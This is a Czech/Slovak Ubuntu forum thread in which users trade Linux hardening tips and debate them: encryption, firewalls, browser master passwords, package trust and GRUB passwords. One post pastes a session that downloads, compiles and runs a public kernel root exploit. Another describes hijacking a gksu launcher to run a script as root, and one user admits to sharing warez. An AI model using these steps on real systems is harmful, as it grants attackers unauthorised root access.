Fórum Ubuntu CZ/SK
Ubuntu pro osobní počítače => Obecná podpora => Téma založeno: arrange 17 Září 2010, 10:22:45
-
Pro mnoho lidí bude toto téma možná zbytečné ("Linux je bezpečný", "Ubuntu má v defaultu nastavenou bezpečnou politiku" atd), ale chtěl bych dát dohromady pár tipů pro uživatele Ubuntu, kteří mají zájem zlepšit odolnost svého systému (klidně jim třeba říkejte paranoici) nebo sebe samého :) .
Tipy mohou být konkrétní (změňte parametr ten a ten), nebo i obecnější (jak se bránit phishingu, hesla apod.) Měly by být asi směrovány na mírně pokročilé až pokročilé uživatele.
Snad by se hodil i nějaký souhrn dát později na wiki, takže bude fajn, když vaše tipy budou mít nějakou strukturu, i když ne povinně :)
Třeba:
- název
- popis problému, proč důležité
- návod pro Ubuntu
- výhody, nevýhody daného postupu, tipu
- příklady zneužití dané slabiny v historii
- odkazy, linky
-
Super napad. Napriklad
1. Encriptacia home
2. Zbytocne neintstalovat vsetko co pride do cesty.
3. Pouzivanie password managera.
4. Vytvorenie encryptovanej virtualnej particii.
5. Firewall UFW alebo GUFW
6. BetterPrivacy, Cookie safe pre firefox.
7. Vytvorenie profilov pre firefox.
No trocha paranoje nikdy neuskodi ;D
-
Zapnout si ten non-execute parametr v BIOSu počítače v nastavení procesoru (většina desek s Intelem to má defaultně vypnuté,protože Windows s tím mají problém),ale u Linuxu se hodí to zapnout,jinak lze procesoru podstrčit instrukci která si vezme 100% výkonu,systém při tom téměř zamrzne a hlavně vykonává přednostně pouze tuhle instrukci,ale proces stejně jede jen pod přihlášeným uživatelem,takže riziko je celkem malé
-
Nejlepší nápad na bezpečnost jakéhokoliv počítače s jakýmkoliv OS je nepřipojovat ho na net a je to ;D
-
Nejlepší nápad na bezpečnost jakéhokoliv počítače s jakýmkoliv OS je nepřipojovat ho na net a je to ;D
No, jenže to ho neochrání před samotným uživatlem ;D Proto bych spíše doporučil nechat počítač zabalený v krabici ;D
-
Nejlepší nápad na bezpečnost jakéhokoliv počítače s jakýmkoliv OS je nepřipojovat ho na net a je to ;D
No, jenže to ho neochrání před samotným uživatlem ;D Proto bych spíše doporučil nechat počítač zabalený v krabici ;D
Taky dobrá rada ;D ... já být ministrem vnitra, tak bych zakázal internet i počítače i mobily a vlastně všechny technologie... vždyť v jeskyni bylo tak fajn ;)
-
nápad na téma dobrý, nicméně do tipů/triků až nějaký souhrn bez nesmylů.
-
1. Encriptacia home
Není to pomalé? Co když mám v domovském adresáři desítky gigabajtů filmů? :)
-
dm_crpyt, LUKS, AES, cbc-essiv, sha:256
Postup? Ten kdo na to má ať si projde články na rootu (http://www.root.cz/serialy/diskove-sifrovani-pomoci-dm-cryptluks/), dávat step by step návod pro začátečníky by mohlo být kontraproduktivní v tom smyslu, že člověk musí vědět co se stane, když vypadne disk, nebo se něco špatně zapíše atd.
Co se týče výkonu, tak tady jsou grafy i s přístupovou dobou:
http://ubuntu.tomasbrincil.cz/RAID/
Mám tři disky:
1TB [500GB RAID1 - disk1]&[500GB RAID0 - disk1]
1TB [500GB RAID1 - disk2]&[500GB RAID0 - disk2]
500GB - [500GB RAID0 - disk3]
Tedy celkově:
RAID 1 s dvěma "disky" o kapacitě: 500GB
RAID 0 s třemi "disky" o kapacitě: 1,5TB
Šifrovaný je každý /dev/mdx.
A kdo že je paranoidní? ;D
-
Díky snoumen za konečně použitelný příspěvek :)
Mám k tomu idiotský dotaz, anžto nepoužívám: k čemu je to dobré? Respektive, v tvém konkrétním případě, proti čemu to má chránit? Chápal bych to na notebooku, který obsahuje vysoce citlivá data, a který je pravidelně vypínán, ale jinak?
-
No nevim jak to má většina lidí s velkými disky, ale asi takhle. Fotek mám < 100GB, ostatních věcí max 10GB. Zbytek?
Pokud budu pouze stahovat filmy, tak ok, ale jestliže po mně někdo půjde, tak v ruce budou mít minimálně logy, jak něco sdílím a jakejkoliv warez potom je důkaz.
Šifruju tedy z jednoho prostého důvodu, až si jednou přijde Policie ČR pro disky, že něco sdílím, tak místo mlácení kladivem do disku
(nebudu odpovídat, jestli jsem měl vždy blízko PC kladivo a byl připraven mařit vyšetřování trestného činu ;D)
odevzdám disky a na notebooku si vydržim, než to vzdají a vrátí mi je :)
-
Aha, takže ta případná policie pěkně hačne a počká, až si vypneš počítač, aby mohla vybrat ty disky? Nebylo by lepší si to zkopírovat z běžícího systému?
A - hypoteticky, neznám žádný konkrétní případ - nebudou policii stačit logy od ISP nebo něco podobného?
-
Nevim neřešim, sedim na veřejce a uploaduju co se dá.
Tohle je prostě pro mě jako paranoika lepší pocit bezpečí.
Shred je pomalej.
Ani tak najde o to vypnutí PC, stačí aby vytrhli disky a při zapnutí se před dešifrováním hlavního RAIDu systém ptá na heslo, bez toho disky vůbec nepřipojí.
-
Máte tipy na zvýšení bezpečnosti Ubuntu?
Nezapínat počítač.
-
No nevim jak to má většina lidí s velkými disky, ale asi takhle. Fotek mám < 100GB, ostatních věcí max 10GB. Zbytek?
Pokud budu pouze stahovat filmy, tak ok, ale jestliže po mně někdo půjde, tak v ruce budou mít minimálně logy, jak něco sdílím a jakejkoliv warez potom je důkaz.
Šifruju tedy z jednoho prostého důvodu, až si jednou přijde Policie ČR pro disky, že něco sdílím, tak místo mlácení kladivem do disku
(nebudu odpovídat, jestli jsem měl vždy blízko PC kladivo a byl připraven mařit vyšetřování trestného činu ;D)
odevzdám disky a na notebooku si vydržim, než to vzdají a vrátí mi je :)
Vůbec nejlepší obrana je všude rozhlašovat, že něco sdílíš. ::)
-
Třeba naučit se konfigurovat apparmor profily a upravit ho pro provozovaný soft. Ale hlavně asi používat mozek a RTFM. :-))))))
-
V Thunderbirdu a Firefoxu je možnost použít master password chránící uložená hesla. Při každé nové relaci je uživatel požádán o autorizaci. Fakt užitečná věcička. :)
Thunderbird: Úpravy → Předvolby → Bezpečnost → Uložená hesla → Použít hlavní heslo
Firefox: Úpravy → Předvolby → Zabezpečení → Použít hlavní heslo
-
To je spíš tip na snížení bezpečnosti :)
1. Hesla, která předtím v počítači uložena nebyla (předpokládám), tam teď jsou, i když šifrovaná (soubor signons.sqlite).
2. Také v případě zadání master hesla se pak už znovu zadávat nemusí, a případnému útočníkovi stačí otevřít stránku, na které se uživatel přihlašuje, a heslo se mu tam vyplní automaticky i s uživ. jménem...
Aplikace na hacknutí uložených hesel (samozřejmě čím složitější heslo, tím delší běh):
http://securityxploded.com/firemaster.php
-
To je fakt. Já bych ta hesla nejraději zakázal. ;D
-
Ještě doplněk, protože v tom pův. příspěvku jsem dostatečně nezdůraznil všechny možné varianty, takže Lelkoun má v určitých případech pravdu (sorry...):
jestli si svá přístupová hesla k (webovým, mailovým) účtům ve FF a TB ukládáte, tak je samozřejmě vždy lepší (=bezpečnější) master password aktivovat. Jinak jsou uložena na disku nešifrovaná, a má k nim přístup kdokoli bez nutnosti dešifrovat je.
-
WIKI - Bezpečnost (http://wiki.ubuntu.cz/Bezpe%C4%8Dnost)
-
Když se nezkušený uživatel pokouší nainstalovat jakoukoliv aplikaci ať už pomocí Centra softwaru či pomocí správce Synaptic nemá prakticky žádnou informaci o potenciální (ne) bezpečnosti tohoto balíku. Bohužel nedokážu odhadnout ani posoudit, zda by bylo možné nějakým způsobem z tohoto hlediska klasifikovat tyto instalované balíky a tuto informaci uživateli zobrazit. Tady bych nechal prostor zkušeným, aby sami navrhli nějaké "zásadní" rozdělení, co já vím třeba podle toho jak aplikace přistupuje ke službám OS, či s jakými právy, či kde si co ukládá, či co je schopna nabourat. Třeba by ona (ne) bezpečnost mohla být nějak hierarchicky odvozována podle toho, jaké podpůrné balíky musí ana aplikace nainstalovat. Jaký je váš názor ? Bylo by něco takového vůbec principiálně možné ?
-
...
Pokud se nemýlím, tak například u Mintu se (alespoň u aktualizací) zobrazuje "důvěryhodnost" ve stupnici od 1 do 5, přičemž 5tku se již nedoporučuje instalovat.
-
Když se nezkušený uživatel pokouší nainstalovat jakoukoliv aplikaci ať už pomocí Centra softwaru či pomocí správce Synaptic nemá prakticky žádnou informaci o potenciální (ne) bezpečnosti tohoto balíku. Bohužel nedokážu odhadnout ani posoudit, zda by bylo možné nějakým způsobem z tohoto hlediska klasifikovat tyto instalované balíky a tuto informaci uživateli zobrazit. Tady bych nechal prostor zkušeným, aby sami navrhli nějaké "zásadní" rozdělení, co já vím třeba podle toho jak aplikace přistupuje ke službám OS, či s jakými právy, či kde si co ukládá, či co je schopna nabourat. Třeba by ona (ne) bezpečnost mohla být nějak hierarchicky odvozována podle toho, jaké podpůrné balíky musí ana aplikace nainstalovat. Jaký je váš názor ? Bylo by něco takového vůbec principiálně možné ?
Můj názor je takový, že tak trochu plácáš nesmysly.
I kdyby sis nainstaloval nějakou hodně poťouchlou aplikaci, tak bez práv roota by stejně měla být víceméně bezzubá. Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne. Navíc se tu už něco psalo o tom, jak se dostávají aplikace do oficiálních distribucí, takže...
Ale co, ať žije paranoia :-)
-
co já vím třeba podle toho jak aplikace přistupuje ke službám OS, či s jakými právy, či kde si co ukládá, či co je schopna nabourat.
Není z toho popisu moc jasné, jakým způsobem by měla daná klasifikace probíhat, ale teoreticky je možné oddělit aplikace, které např. spouští démony, instalují initskripty, otevírají porty, obsahují spustitelné soubory se suid právy apod. Jestli jsou takové aplikace automaticky nebezpečnější, těžko říct - asi záleží spíš na zranitelnosti (množství bugů, obecná používanost) a nepostradatelnosti pro běh systému nebo příkladně běh firmy. To se těžko obecně posoudí.
Také je otázka, jestli by uživatel byl schopen detailnější informace k programu náležitě vyhodnotit, a pokud ano, pokud by pak nebylo pro něj jednodušší se mrknout do zdroje 8)
Takže testovací otázka: jaká je důvěryhodnost těchto aplikací (1-5): firefox, gdm, apparmor? Příp. proč? :)
I kdyby sis nainstaloval nějakou hodně poťouchlou aplikaci, tak bez práv roota by stejně měla být víceméně bezzubá. Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
S tím bych si dovolil nesouhlasit. Člověk většinou instaluje s právy roota, takže "poťouchlá aplikace" si může nastavit (třeba pomocí postinst skriptu) víceméně cokoli. Pak si díky právům roota může právě dělat, co chce. To je velká síla a zároveň zranitelnost Linuxu - pro roota prakticky (mimo dejme tomu kernel, který je ale také možno měnit) neexistují restrikce.
-
Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
Obavam se, ze to je velmi zastaraly pohled na vec... (posledni takove Windows byly neuspesne Windows ME - od te doby jsou veskera windows zalozena na NTckach)
Windows NT maji nativne viceuzivatelsky rezim stejne jako unixy uz od dob sveho vzniku (osobne jsem videl poprve linux i winNT nekdy ve skolnim roce '96-'97). A bezna prace s windows pod administratorem je stejne doporucovana praxe jako bezna prace s unixem pod rootem. :-D
Spis bych rekl, ze si lide pusobi skody neznalosti, omylem, nepozornosti a ignorantsvim - tady pak uz nezalezi na typu OS, ale na uzivatelich. Oba typy OS maji potencial minimalizovat napachane skody - jde jen o to, jak jsou pouzivany...
-
Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
Windows NT maji nativne viceuzivatelsky rezim stejne jako unixy uz od dob sveho vzniku...
... což je sice hezké, ale drtivá většina uživatelů s k widlím přihlašuje pod účtem s právy administrátora.
I kdyby sis nainstaloval nějakou hodně poťouchlou aplikaci, tak bez práv roota by stejně měla být víceméně bezzubá. Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
S tím bych si dovolil nesouhlasit. Člověk většinou instaluje s právy roota, takže "poťouchlá aplikace" si může nastavit (třeba pomocí postinst skriptu) víceméně cokoli. Pak si díky právům roota může právě dělat, co chce. To je velká síla a zároveň zranitelnost Linuxu - pro roota prakticky (mimo dejme tomu kernel, který je ale také možno měnit) neexistují restrikce.
No, předpokládám, že do distribuce by se aplikace s nějakým evil postinst skriptem neměla dostat. Krom toho při instalaci běží pod rootem instalátor, nikoliv instalovaná aplikace. Stejně tak předpokládám, že se do dobré distribuce nedostanou nějací divocí démoni, kteří se spouští s právy roota a tropí neplechu. S důrazem na slovo dobré :-)
Ovšem pokud si někdo tak, jak je zvyklý z widlí, někde něco stáhne, nainstaluje a pak se diví, co že se to děje, tak je pak namístě stěžovat si na bezpečnostní díru mezi klávesnicí a židlí, nikoliv v systému :-)
P.S.
A konec konců stále platí to, že vše, s čím zacházíme, ja tak bezpečné, jak bezpečně s tím zacházíme.
-
Také je otázka, jestli by uživatel byl schopen detailnější informace k programu náležitě vyhodnotit, a pokud ano, pokud by pak nebylo pro něj jednodušší se mrknout do zdroje 8)
Takže testovací otázka: jaká je důvěryhodnost těchto aplikací (1-5): firefox, gdm, apparmor? Příp. proč? :)
S tou dvoverihodnostou ,je to tak ved uz v ,,Ubuntu Software Centre,, je vzdy ku kazdemu softu napisane bud :
-Canonical provides critical updates for firefox until April 2013.
-Canonical does not provide updates for Ubuntu restricted extras. Some updates may be provided by the Ubuntu community.
-Canonical provides critical updates for gdm until April 2013.
-Canonical provides critical updates for apparmor until April 2015.
Takze s timto to podla mna vyzera tak, ze firefox, gdm , apparmor su ostro sledovane aplikacie na bezpecnost, ktorym mozem verit. Ale napriklad ,,Ubuntu restricted extras,, by bolo dobre instalaciu zvazit, bo je to zbierka kadejakych uzitocnych softov .
-
Linux prostě nejsou widle, kde si jakýkoliv program může dělat, co ho napadne.
Windows NT maji nativne viceuzivatelsky rezim stejne jako unixy uz od dob sveho vzniku...
... což je sice hezké, ale drtivá většina uživatelů s k widlím přihlašuje pod účtem s právy administrátora.
tak tak - jen to znamena tu drobnost, ze chyba neni v OS, ale v tom, jak jej vetsina uzivatelu pouziva...
-
jen to znamena tu drobnost, ze chyba neni v OS, ale v tom, jak jej vetsina uzivatelu pouziva...
Což je také důležité, protože "na defaultech záleží", takže částečně to chyba OS je.
Takze s timto to podla mna vyzera tak, ze firefox, gdm , apparmor su ostro sledovane aplikacie na bezpecnost, ktorym mozem verit.
Možná máš pravdu, a dané rozdělení na security, main, universe apod. se dá částečně použít. Za předpokladu, že věříš víc Canonicalu než komunitě ;) Problém je ale v tom, že např. internetový prohlížeč je podle mě jedna z nejnebezpečnějších částí systému, díky své rozšířenosti, rozmanitosti (zásadních) aktivit, které na nich děláme ("komunikace s bankou"), komplexnosti, "skriptovatelnosti", nebo prostě jen díky tomu, že to jsou otevřené dveře do světa internetu. Stačí se podívat na počet (známých!) bugů/zranitelností, které se téměř denně ve FF najdou (http://web.nvd.nist.gov/view/vuln/statistics). A je (v zásadě) jedno, kdo ho spravuje.
Krom toho při instalaci běží pod rootem instalátor, nikoliv instalovaná aplikace.
To je sice pravda, ale instalátor žádným způsobem neomezuje, co si daná aplikace (a s jakými právy) nainstaluje, takže z hlediska bezpečnosti je to šumafú.
-
Za předpokladu, že věříš víc Canonicalu než komunitě ;)
To aby sme sa zase rozumeli, linux je open source, do ktorej nazera cela komunita a tak isto aj firmy. Ono to neznamena tak ,ze o firefox sa stara iba Canonical a komunita nie, prave naopak. O vsetko sa stara komunita ludi ,ale o urcity softwer ktory je suportovany distribuciou ubuntu ako je firefox ,apparmor...atd..sa dokladne este ku komunite staraju aj experti z Canonicalu. A ked sa tento isty soft nachadza aj v inych znamich ci neznamich distrach ako su gentoo ,fedora... tiez tam do sourcu nazeraju dalsi experti. Preto sa da v klude povedat, ze tento soft je bezpecny. V porovnani niejakym skypkom, alebo operou co je uzavrety kod, si tam hocijaky rumun moze natrieskat malwer a dlho potrva ked mu na to pridu. A to si na skypko mozes nastavit aj apparmor profili a ti to mozno vobec nepomoze.
-
Zatraceně zajímavé téma, které arrange založil.
Což je také důležité, protože "na defaultech záleží", takže částečně to chyba OS je.a to je 100% pravda praxí ověřená. Převážná většina uživatelů počítačů totiž vůbec netuší jak si co nastavit atd. Jsou rádi, že zvládnou alespoň instalaci anebo si to nechají instalovat, či už koupí předinstalovaný poč. A dál to neřeší a používají to tak jak to je.
Brdokoky zmínil Skype, například. Osobně si myslím, že pokud budeme žít ve společnosti kde vítězí zisk nad zdravým rozumem, tak se velmi těžko bude zajišťovat bezpečnost počítačů. Skype je totiž typickým příkladem toho, že někdo vymyslí zajímavý projekt, ze kterého se dá těžit, zařídí masivní kampaň, aby oslovil co možná nejvíce uživatelů, nabídne jistou úlytbu. No a než se jeden ohlédne máme tu další potenciálně nebezpečný produkt. Není zkrátka čas zareagovat včas a varovat usery před tím, než to začnou používat. To je dnešní svět.
Arrange napsal:Problém je ale v tom, že např. internetový prohlížeč je podle mě jedna z nejnebezpečnějších částí systému,
díky své rozšířenosti, rozmanitosti (zásadních) aktivit, které na nich děláme ("komunikace s bankou"), komplexnosti, "skriptovatelnosti",
nebo prostě jen díky tomu, že to jsou otevřené dveře do světa internetu.Další 100% pravda. Uvedu jeden příklad z mých zkušeností s lidmi. Totiž obecně považuji FF za nejlepší prohlížeč ve všech aspektech v porovnání s ostatními. A již několikrát když tu a tam mne někdo osloví a požádá o pomoc, tak se jich ptám, proč používáte IE když FF je lepší a bezpečnější. A co mi odpověděli? Dost mne to poprvé ohromilo. "FF se mi nelíbí, špatně se ovládá, furt na mne vyskakují nějaké hlášky o modulech či co. IE je lepší protože je ticho".
No a tady bych se rád zeptal, jak chcete vyřešit tento postoj například ve Firefoxu? pro lidi je totiž pohodlí ovládání daleko důležitější než "nějaká" bezpečnost. Tu řeší až když ochoří jejich bobánek tím, že to dají někomu k léčbě. Zrovna Firefox je typický příklad toho, že nejde pouze o prohlížeč samotný, ale on má možnost vkládat moduly od dalších tvůrců, pluginy, doplňky. Jestli té diskusi, kterou založil Arrange, správně rozumím, tak mu jde o to, jak zabezpečit Ubuntu hned po instalaci systému proti napadení zvenčí.
Padla tu otázka komu vlastně věřit, jestli komunitě nebo Canonicalu. To je těžké, žijeme ve společnosti ekonomických zájmů, kde když se zastaví růst, tak ti ekonomičtí nenažranci vyhlašujou poplach. Takže v této souvislosti považuji Canonical za součást ekonomiky, jde mu totiž hlavně o to, jak s Ubuntu naložit až přijde jeho čas. Je to kšeft, o tom já nepochybuji. Komunita bude v opozici.
A mám já vůbec tip na zvýšení bezpečnosti Ubuntu? Čoveče já vůbec nevím jestli to jde. Běží v něm mnoho jiného softwaru, jejichž tvůrci mají jiné postoje, jiné priority. Mohlo by to jít jedině, pokud by celý systém včetně internetu byl vytvořen samostatným subjektem jako celek. Třeba jako Android ;)
-
linux nejsou sice wokna ale v tomto případě se jakýkoliv rozdíly stíraj.... zatímco ve starých dobrých jedinečných dokonalých bestovních (až skoro se boim že z toho pomalu někteří XP zaslepenci udělali nový linux distro a cpou to "všude a zadarmo") zatímco po tyto byly všeobecný root práva default, tak od Vista/7 to tak není, i hlavní admin účet nemá root práva a systém se na ně dotazuje pomocí otravného UAC (který jak známo zase každej rádobyexpert hnedka vypíná, že ho to otravuje, mezi náma když mě Ubuntu každý přihlášení do systému otravuje se zadá ním hesla k nějký "přihlašovací klíčence" ky mámzadáno přihlašovt automaticky, tak mě to root heslo taky docela otravuje a rád bych v linuxu ty root dotazy vypnul....
ovšem princim pro uživatele "typu bezmozek" je stejný, chce do systému "nacpat" tu pochybnou aplikaci s nedůvěryhodným zdrojem, prostě ji tam chce, tak v obou případech povýší práva na roota a "otevře dveře":-))
-
a to je 100% pravda...
Další 100% pravda...
Miluju 100% pravdy. Obvykle se z nich vyklube pěknej feljmíček :-)
-
Ach ouvejs, flejmíček jsem neměl v úmyslu. Bylo to pouze zamyšlení nad otázkami bezpečnosti k podpoře toho o co se v tomto tématu arrange snaží. Rozhodně má smysl se tímto zabývat. Dám si příště pozor.
-
V pohodě :-)
Beztak se du beseduje spíš než o bezpečnosti systému jako takového o tom, jak dokáže správně sebevědomý BFU poslat sebezabezpečenější systém jedním kliknutím totálně do háje. A to je, myslím, jádro pudla!!!
-
jak dokáže správně sebevědomý BFU poslat sebezabezpečenější systém jedním kliknutím totálně do háje
JJ, souhlas, měly by to být tipy, co dělat, ale i co NEdělat, takže směle do toho! ;)
-
jak dokáže správně sebevědomý BFU poslat sebezabezpečenější systém jedním kliknutím totálně do háje
JJ, souhlas, měly by to být tipy, co dělat, ale i co NEdělat, takže směle do toho! ;)
Však už jsem psal: http://forum.ubuntu.cz/index.php/topic,50322.msg363358.html#msg363358
-
Tu je zaujimava stranka, chlapik vysvetluje ako sa da pouzit virus na linuxe. Dost ma to zaskocilo.
How to write a Linux virus in 5 easy steps
http://www.geekzone.co.nz/foobar/6229 (http://www.geekzone.co.nz/foobar/6229)
-
Tu je zaujimava stranka, chlapik vysvetluje ako sa da pouzit virus na linuxe. Dost ma to zaskocilo.
How to write a Linux virus in 5 easy steps
http://www.geekzone.co.nz/foobar/6229 (http://www.geekzone.co.nz/foobar/6229)
Díky za tip, docela jsem se těšil, jak to bude fungovat, ale buď mi něco uniklo, anebo je tento postup v novém Gnome víceméně nanic:
- příloha typu desktop se v Thunderbirdu objeví nahá jako textový soubor, takže jde všechny skryté poťouchlosti přečíst
- kdyby i tak se někdo dal přesvědčit, ať tento soubor uloží na plochu, stejně opět uvidí jen textový soubor, který NEMÁ práva spouštění
- i kdyby na něj kliknul, objeví se okno s varováním, a jediná možnost je Zrušit
Ano, pokud vytvořím spouštěč na vlastním stroji, tak to funguje dle popisu, pokud to ale pošlu mailem nebo přes web (taky jsem zkoušel), tak velmi, velmi těžko.
(http://img72.imageshack.us/img72/7443/linuxvirus.png) (http://img72.imageshack.us/i/linuxvirus.png/)
-
Á, tak druhá část příspěvku, jak získat root práva, je už mnohem zajímavější, včetně poznámky uživatele Flimm.
POKUD se mi podaří přimět uživatele, aby spustil můj skript (to je ta těžší část), je možné pomocí změny spouštěče aplikace typu Synaptic, Zdroje softwaru apod. (používající pro spouštění gksu) zaručit, aby se spustil i nějaký můj skript s právy root bez toho, že by si toho uživatel měl šanci všimnout (to jsem si vyzkoušel). Dobrá zpráva je, že gksu dnes mohutně ustupuje na úkor PolicyKit, kde by to už bylo mnohem náročnější, ale asi ne nemožné - to si nejsem jistý :P.
-
Tak jsem si myslel že šifrování je to nejlepší co mohu pro svou bezpečnost udělat ale toto mě dostalo. :o
http://technet.idnes.cz/tec_technika.asp?c=A080221_230606_tec_denik_pka (http://technet.idnes.cz/tec_technika.asp?c=A080221_230606_tec_denik_pka)
Sice šlo o windows šifrování ale předpokládám že Linux také ukládá heslo do paměti RAM. Takže šifrováním sice nemusím rozmlátit HDD kladivem ale místo toho musím rozšlapat RAM ;D
-
Tak jsem si myslel že šifrování je to nejlepší co mohu pro svou bezpečnost udělat ale toto mě dostalo. :o
http://technet.idnes.cz/tec_technika.asp?c=A080221_230606_tec_denik_pka (http://technet.idnes.cz/tec_technika.asp?c=A080221_230606_tec_denik_pka)
Sice šlo o windows šifrování ale předpokládám že Linux také ukládá heslo do paměti RAM. Takže šifrováním sice nemusím rozmlátit HDD kladivem ale místo toho musím rozšlapat RAM ;D
Ale klíd, to houbeles. Podívej se co zkoumá např. NBU - http://www.nbu.cz/cs/vyzkum-a-vyvoj/, třetí odrážka :-)
-
To jako klid že se neubráním ať dělám co chci nebo že tak šikovní naši úředníci nejsou ???
-
To jako klid že se neubráním ať dělám co chci nebo že tak šikovní naši úředníci nejsou ???
No, pokud třeba falšuješ účetnictví a přitom elektromagneticky vyzařuješ, tak si pak nestěžuj. Čistě teoreticky může za zdí sedět úředník s mašinkou připomínající diktafon, kterou jistě zvládne obsluhovat i (běžný franta) úředník a která zaznamenává a zaznamenává a interpretuje a ... :-)
-
Také pravidelně aktualizovat systém. Třeba teď, pokud jste za posledních pár dnů neaktualizovali, máte díru v kernelu...
arrange@mm-lean:~$ wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c
arrange@mm-lean:~$ gcc -o exploit linux-rds-exploit.c
arrange@mm-lean:~$ ./exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xf9bf8a40
[+] Resolved rds_ioctl to 0xf9bf2000
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root
Zdroj:
http://www.vsecurity.com/resources/advisory/20101019-1/
-
Snad jsem to neprehledl nekde vyse:
Bezpecnost/zabezpeceni Grubu
Duvod:
Po defaultni instalaci si system vynuti heslo (ted myslim v systemu), pri zmene tohoto hesla si pamatuje kde co, kdyz jsem jej chtel zmenit kvuli testum, po delsi dobe jsem to vzdal (chtel jsem jednodussi - netvrdim, ze to nejde nastavit, intuitivne jsem na to neprisel) - celkovy dojem LAIKA (treba me) - Ubuntu je dobre a paranoidne zabezpeceno.
PAK zjistim, ze skrze Grub (taktez v defaultnim nastaveni) je mozne heslo roota bez problemu obejit...
-
@panet
A teď si vem, že kdokoliv ti může do kompu vrazit flešku, nabootovat z ní nějakou live distribuci a upravovat co bude chtít! Ta hrůza!
-
O tom to snad neni...
Bootovat muze, az mu to bios dovoli. Musi podniknout nejake kroky, mit tu flashku a podobne. U nezabezpeceneho Grubu nepotrebuje nic.
-
flash se strčí do kapsy, při startu zmáčkne F8 a vybere boot z USB - co je na tom těžkého?
většinou(!) lze boot z USB zakázat a BIOS zaheslovat, ale BFU to stejně neumí nastavit
jediné pořádné zabezpečení je šifrování
ale je fakt, že by to nastavení autentizace (http://grub.enbug.org/Authentication) mohli alespoň do toho Startupmanageru (nebo jak se to jmenuje)
-
Prijde ti, ze to vlakno je o tom, jak se bootuje z flashky?
-
Prijde ti, ze to vlakno je o tom, jak se bootuje z flashky?
Toto vlákno je od samého počátku o tom, co zde nelze publikovat, neboť je to automaticky nahrazeno výrazem censored. Such a bloody flame :-)
-
Me to podle toho, co napsal Arrange prijde naopak pomerne smysluplne a pokud to ma byt i pro mirne pokrocile, Vy odbornici s Yontalcarem se smejte a rypejte si v duchu.
Treba to co jsem napsal, neni v zakladnim navodu "Po instalacnim (http://wiki.ubuntu.cz/Pr%C5%AFvodce%20po%20instalaci#P.2BAOE-r_rad_z.2BAOE-v.2BARs-rem ani v http://wiki.ubuntu.cz/GRUB)" na wiky, takze primarne me to opravdu nenapadne, zejmena, jak jsem napsal, pri az paranoidnim sledovani historie hesel systemem me nenanpadne, ze cast systemu je bez hesla vydana napospas. Proste bych to neocekaval.
-
To není nic proti arrangeovi, to jen že takovéhle téma se prostě zákonitě zvrhne na výkřiky typu: "Proč mě to pořád otravuje s heslem, když v recovery mode..., boot z live CD, boot z flash disku" a podobně.
Zkátka a dobře, bavit se o bezpečnosti systému v situaci, kdy nejsou disky komplet důkladně zašifrované a nebo - ještě lépe - není zabezpečeno, že se k počítači fyzicky nedostane někdo nepovolaný, je dle mého soudu iluzorní.
Ale jinak samozřejmě poklona všem, kteří to "mysleli dobře" :-)